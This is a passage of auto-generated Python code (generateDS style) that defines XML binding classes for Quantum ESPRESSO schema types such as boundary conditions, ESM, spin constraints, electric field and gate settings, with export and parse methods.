def export(self, outfile, level, namespaceprefix_='qes:', name_='boundary_conditionsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('boundary_conditionsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='boundary_conditionsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='boundary_conditionsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='boundary_conditionsType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='boundary_conditionsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.assume_isolated is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:assume_isolated>%s</qes:assume_isolated>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.assume_isolated), input_name='assume_isolated')), eol_))
if self.esm is not None:
self.esm.export(outfile, level, namespaceprefix_, name_='esm', pretty_print=pretty_print)
if self.fcp_opt is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:fcp_opt>%s</qes:fcp_opt>%s' % (self.gds_format_boolean(self.fcp_opt, input_name='fcp_opt'), eol_))
if self.fcp_mu is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:fcp_mu>%s</qes:fcp_mu>%s' % (self.gds_format_double(self.fcp_mu, input_name='fcp_mu'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'assume_isolated':
assume_isolated_ = child_.text
assume_isolated_ = self.gds_validate_string(assume_isolated_, node, 'assume_isolated')
self.assume_isolated = assume_isolated_
elif nodeName_ == 'esm':
obj_ = esmType.factory()
obj_.build(child_)
self.esm = obj_
obj_.original_tagname_ = 'esm'
elif nodeName_ == 'fcp_opt':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'fcp_opt')
self.fcp_opt = ival_
elif nodeName_ == 'fcp_mu' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'fcp_mu')
self.fcp_mu = fval_
# end class boundary_conditionsType
class esmType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, bc=None, nfit=None, w=None, efield=None):
self.original_tagname_ = None
self.bc = bc
self.nfit = nfit
self.w = w
self.efield = efield
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, esmType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if esmType.subclass:
return esmType.subclass(*args_, **kwargs_)
else:
return esmType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_bc(self): return self.bc
def set_bc(self, bc): self.bc = bc
def get_nfit(self): return self.nfit
def set_nfit(self, nfit): self.nfit = nfit
def get_w(self): return self.w
def set_w(self, w): self.w = w
def get_efield(self): return self.efield
def set_efield(self, efield): self.efield = efield
def hasContent_(self):
if (
self.bc is not None or
self.nfit is not None or
self.w is not None or
self.efield is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='esmType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('esmType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='esmType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='esmType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='esmType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='esmType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.bc is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:bc>%s</qes:bc>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.bc), input_name='bc')), eol_))
if self.nfit is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nfit>%s</qes:nfit>%s' % (self.gds_format_integer(self.nfit, input_name='nfit'), eol_))
if self.w is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:w>%s</qes:w>%s' % (self.gds_format_double(self.w, input_name='w'), eol_))
if self.efield is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:efield>%s</qes:efield>%s' % (self.gds_format_double(self.efield, input_name='efield'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'bc':
bc_ = child_.text
bc_ = self.gds_validate_string(bc_, node, 'bc')
self.bc = bc_
elif nodeName_ == 'nfit' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nfit')
self.nfit = ival_
elif nodeName_ == 'w' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'w')
self.w = fval_
elif nodeName_ == 'efield' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'efield')
self.efield = fval_
# end class esmType
class ekin_functionalType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, ecfixed=None, qcutz=None, q2sigma=None):
self.original_tagname_ = None
self.ecfixed = ecfixed
self.qcutz = qcutz
self.q2sigma = q2sigma
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ekin_functionalType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ekin_functionalType.subclass:
return ekin_functionalType.subclass(*args_, **kwargs_)
else:
return ekin_functionalType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ecfixed(self): return self.ecfixed
def set_ecfixed(self, ecfixed): self.ecfixed = ecfixed
def get_qcutz(self): return self.qcutz
def set_qcutz(self, qcutz): self.qcutz = qcutz
def get_q2sigma(self): return self.q2sigma
def set_q2sigma(self, q2sigma): self.q2sigma = q2sigma
def hasContent_(self):
if (
self.ecfixed is not None or
self.qcutz is not None or
self.q2sigma is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='ekin_functionalType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ekin_functionalType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ekin_functionalType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='ekin_functionalType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='ekin_functionalType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='ekin_functionalType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.ecfixed is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ecfixed>%s</qes:ecfixed>%s' % (self.gds_format_double(self.ecfixed, input_name='ecfixed'), eol_))
if self.qcutz is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:qcutz>%s</qes:qcutz>%s' % (self.gds_format_double(self.qcutz, input_name='qcutz'), eol_))
if self.q2sigma is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:q2sigma>%s</qes:q2sigma>%s' % (self.gds_format_double(self.q2sigma, input_name='q2sigma'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ecfixed' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ecfixed')
self.ecfixed = fval_
elif nodeName_ == 'qcutz' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'qcutz')
self.qcutz = fval_
elif nodeName_ == 'q2sigma' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'q2sigma')
self.q2sigma = fval_
# end class ekin_functionalType
class spin_constraintsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, spin_constraints=None, lagrange_multiplier=None, target_magnetization=None):
self.original_tagname_ = None
self.spin_constraints = spin_constraints
self.lagrange_multiplier = lagrange_multiplier
self.target_magnetization = target_magnetization
self.validate_d3vectorType(self.target_magnetization)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, spin_constraintsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if spin_constraintsType.subclass:
return spin_constraintsType.subclass(*args_, **kwargs_)
else:
return spin_constraintsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_spin_constraints(self): return self.spin_constraints
def set_spin_constraints(self, spin_constraints): self.spin_constraints = spin_constraints
def get_lagrange_multiplier(self): return self.lagrange_multiplier
def set_lagrange_multiplier(self, lagrange_multiplier): self.lagrange_multiplier = lagrange_multiplier
def get_target_magnetization(self): return self.target_magnetization
def set_target_magnetization(self, target_magnetization): self.target_magnetization = target_magnetization
def validate_d3vectorType(self, value):
# Validate type d3vectorType, a restriction on double.
if value is not None and Validate_simpletypes_:
if len(str(value)) != 3:
warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
def hasContent_(self):
if (
self.spin_constraints is not None or
self.lagrange_multiplier is not None or
self.target_magnetization is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='spin_constraintsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('spin_constraintsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='spin_constraintsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='spin_constraintsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='spin_constraintsType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='spin_constraintsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.spin_constraints is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:spin_constraints>%s</qes:spin_constraints>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.spin_constraints), input_name='spin_constraints')), eol_))
if self.lagrange_multiplier is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:lagrange_multiplier>%s</qes:lagrange_multiplier>%s' % (self.gds_format_double(self.lagrange_multiplier, input_name='lagrange_multiplier'), eol_))
if self.target_magnetization is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:target_magnetization>%s</qes:target_magnetization>%s' % (self.gds_format_double_list(self.target_magnetization, input_name='target_magnetization'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'spin_constraints':
spin_constraints_ = child_.text
spin_constraints_ = self.gds_validate_string(spin_constraints_, node, 'spin_constraints')
self.spin_constraints = spin_constraints_
elif nodeName_ == 'lagrange_multiplier' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'lagrange_multiplier')
self.lagrange_multiplier = fval_
elif nodeName_ == 'target_magnetization':
target_magnetization_ = child_.text
target_magnetization_ = self.gds_validate_double_list(target_magnetization_, node, 'target_magnetization')
self.target_magnetization = target_magnetization_
# validate type d3vectorType
self.validate_d3vectorType(self.target_magnetization)
# end class spin_constraintsType
class electric_fieldType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, electric_potential=None, dipole_correction=False, gate_settings=None, electric_field_direction=None, potential_max_position=None, potential_decrease_width=None, electric_field_amplitude=None, electric_field_vector=None, nk_per_string=None, n_berry_cycles=None):
self.original_tagname_ = None
self.electric_potential = electric_potential
self.validate_electric_potentialType(self.electric_potential)
self.dipole_correction = dipole_correction
self.gate_settings = gate_settings
self.electric_field_direction = electric_field_direction
self.potential_max_position = potential_max_position
self.potential_decrease_width = potential_decrease_width
self.electric_field_amplitude = electric_field_amplitude
self.electric_field_vector = electric_field_vector
self.validate_d3vectorType(self.electric_field_vector)
self.nk_per_string = nk_per_string
self.n_berry_cycles = n_berry_cycles
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, electric_fieldType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if electric_fieldType.subclass:
return electric_fieldType.subclass(*args_, **kwargs_)
else:
return electric_fieldType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_electric_potential(self): return self.electric_potential
def set_electric_potential(self, electric_potential): self.electric_potential = electric_potential
def get_dipole_correction(self): return self.dipole_correction
def set_dipole_correction(self, dipole_correction): self.dipole_correction = dipole_correction
def get_gate_settings(self): return self.gate_settings
def set_gate_settings(self, gate_settings): self.gate_settings = gate_settings
def get_electric_field_direction(self): return self.electric_field_direction
def set_electric_field_direction(self, electric_field_direction): self.electric_field_direction = electric_field_direction
def get_potential_max_position(self): return self.potential_max_position
def set_potential_max_position(self, potential_max_position): self.potential_max_position = potential_max_position
def get_potential_decrease_width(self): return self.potential_decrease_width
def set_potential_decrease_width(self, potential_decrease_width): self.potential_decrease_width = potential_decrease_width
def get_electric_field_amplitude(self): return self.electric_field_amplitude
def set_electric_field_amplitude(self, electric_field_amplitude): self.electric_field_amplitude = electric_field_amplitude
def get_electric_field_vector(self): return self.electric_field_vector
def set_electric_field_vector(self, electric_field_vector): self.electric_field_vector = electric_field_vector
def get_nk_per_string(self): return self.nk_per_string
def set_nk_per_string(self, nk_per_string): self.nk_per_string = nk_per_string
def get_n_berry_cycles(self): return self.n_berry_cycles
def set_n_berry_cycles(self, n_berry_cycles): self.n_berry_cycles = n_berry_cycles
def validate_electric_potentialType(self, value):
# Validate type electric_potentialType, a restriction on string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['sawtooth_potential', 'homogenous_field', 'Berry_Phase', 'none']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on electric_potentialType' % {"value" : value.encode("utf-8")} )
def validate_d3vectorType(self, value):
# Validate type d3vectorType, a restriction on double.
if value is not None and Validate_simpletypes_:
if len(str(value)) != 3:
warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
def hasContent_(self):
if (
self.electric_potential is not None or
self.dipole_correction or
self.gate_settings is not None or
self.electric_field_direction is not None or
self.potential_max_position is not None or
self.potential_decrease_width is not None or
self.electric_field_amplitude is not None or
self.electric_field_vector is not None or
self.nk_per_string is not None or
self.n_berry_cycles is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='electric_fieldType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('electric_fieldType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='electric_fieldType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='electric_fieldType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='electric_fieldType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='electric_fieldType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.electric_potential is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:electric_potential>%s</qes:electric_potential>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.electric_potential), input_name='electric_potential')), eol_))
if self.dipole_correction:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:dipole_correction>%s</qes:dipole_correction>%s' % (self.gds_format_boolean(self.dipole_correction, input_name='dipole_correction'), eol_))
if self.gate_settings is not None:
self.gate_settings.export(outfile, level, namespaceprefix_, name_='gate_settings', pretty_print=pretty_print)
if self.electric_field_direction is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:electric_field_direction>%s</qes:electric_field_direction>%s' % (self.gds_format_integer(self.electric_field_direction, input_name='electric_field_direction'), eol_))
if self.potential_max_position is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:potential_max_position>%s</qes:potential_max_position>%s' % (self.gds_format_double(self.potential_max_position, input_name='potential_max_position'), eol_))
if self.potential_decrease_width is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:potential_decrease_width>%s</qes:potential_decrease_width>%s' % (self.gds_format_double(self.potential_decrease_width, input_name='potential_decrease_width'), eol_))
if self.electric_field_amplitude is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:electric_field_amplitude>%s</qes:electric_field_amplitude>%s' % (self.gds_format_double(self.electric_field_amplitude, input_name='electric_field_amplitude'), eol_))
if self.electric_field_vector is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:electric_field_vector>%s</qes:electric_field_vector>%s' % (self.gds_format_double_list(self.electric_field_vector, input_name='electric_field_vector'), eol_))
if self.nk_per_string is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nk_per_string>%s</qes:nk_per_string>%s' % (self.gds_format_integer(self.nk_per_string, input_name='nk_per_string'), eol_))
if self.n_berry_cycles is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:n_berry_cycles>%s</qes:n_berry_cycles>%s' % (self.gds_format_integer(self.n_berry_cycles, input_name='n_berry_cycles'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'electric_potential':
electric_potential_ = child_.text
electric_potential_ = self.gds_validate_string(electric_potential_, node, 'electric_potential')
self.electric_potential = electric_potential_
# validate type electric_potentialType
self.validate_electric_potentialType(self.electric_potential)
elif nodeName_ == 'dipole_correction':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'dipole_correction')
self.dipole_correction = ival_
elif nodeName_ == 'gate_settings':
obj_ = gate_settingsType.factory()
obj_.build(child_)
self.gate_settings = obj_
obj_.original_tagname_ = 'gate_settings'
elif nodeName_ == 'electric_field_direction' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'electric_field_direction')
self.electric_field_direction = ival_
elif nodeName_ == 'potential_max_position' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'potential_max_position')
self.potential_max_position = fval_
elif nodeName_ == 'potential_decrease_width' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'potential_decrease_width')
self.potential_decrease_width = fval_
elif nodeName_ == 'electric_field_amplitude' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'electric_field_amplitude')
self.electric_field_amplitude = fval_
elif nodeName_ == 'electric_field_vector':
electric_field_vector_ = child_.text
electric_field_vector_ = self.gds_validate_double_list(electric_field_vector_, node, 'electric_field_vector')
self.electric_field_vector = electric_field_vector_
# validate type d3vectorType
self.validate_d3vectorType(self.electric_field_vector)
elif nodeName_ == 'nk_per_string' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'nk_per_string')
self.nk_per_string = ival_
elif nodeName_ == 'n_berry_cycles' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'n_berry_cycles')
self.n_berry_cycles = ival_
# end class electric_fieldType
class gate_settingsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, use_gate=None, zgate=None, relaxz=None, block=None, block_1=None, block_2=None, block_height=None):
self.original_tagname_ = None
self.use_gate = use_gate
self.zgate = zgate
self.relaxz = relaxz
self.block = block
self.block_1 = block_1
self.block_2 = block_2
self.block_height = block_height
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, gate_settingsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if gate_settingsType.subclass:
return gate_settingsType.subclass(*args_, **kwargs_)
else:
return gate_settingsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_use_gate(self): return self.use_gate
def set_use_gate(self, use_gate): self.use_gate = use_gate
def get_zgate(self): return self.zgate
def set_zgate(self, zgate): self.zgate = zgate
def get_relaxz(self): return self.relaxz
def set_relaxz(self, relaxz): self.relaxz = relaxz
def get_block(self): return self.block
def set_block(self, block): self.block = block
def get_block_1(self): return self.block_1
def set_block_1(self, block_1): self.block_1 = block_1
def get_block_2(self): return self.block_2
def set_block_2(self, block_2): self.block_2 = block_2
def get_block_height(self): return self.block_height
def set_block_height(self, block_height): self.block_height = block_height
def hasContent_(self):
if (
self.use_gate is not None or
self.zgate is not None or
self.relaxz is not None or
self.block is not None or
self.block_1 is not None or
self.block_2 is not None or
self.block_height is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='gate_settingsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('gate_settingsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='gate_settingsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='gate_settingsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='gate_settingsType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='gate_settingsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.use_gate is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:use_gate>%s</qes:use_gate>%s' % (self.gds_format_boolean(self.use_gate, input_name='use_gate'), eol_))
if self.zgate is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:zgate>%s</qes:zgate>%s' % (self.gds_format_double(self.zgate, input_name='zgate'), eol_))
if self.relaxz is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:relaxz>%s</qes:relaxz>%s' % (self.gds_format_boolean(self.relaxz, input_name='relaxz'), eol_))
if self.block is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:block>%s</qes:block>%s' % (self.gds_format_boolean(self.block, input_name='block'), eol_))
if self.block_1 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:block_1>%s</qes:block_1>%s' % (self.gds_format_double(self.block_1, input_name='block_1'), eol_))
if self.block_2 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:block_2>%s</qes:block_2>%s' % (self.gds_format_double(self.block_2, input_name='block_2'), eol_))
if self.block_height is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:block_height>%s</qes:block_height>%s' % (self.gds_format_double(self.block_height, input_name='block_height'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'use_gate':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'use_gate')
self.use_gate = ival_
elif nodeName_ == 'zgate' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'zgate')
self.zgate = fval_
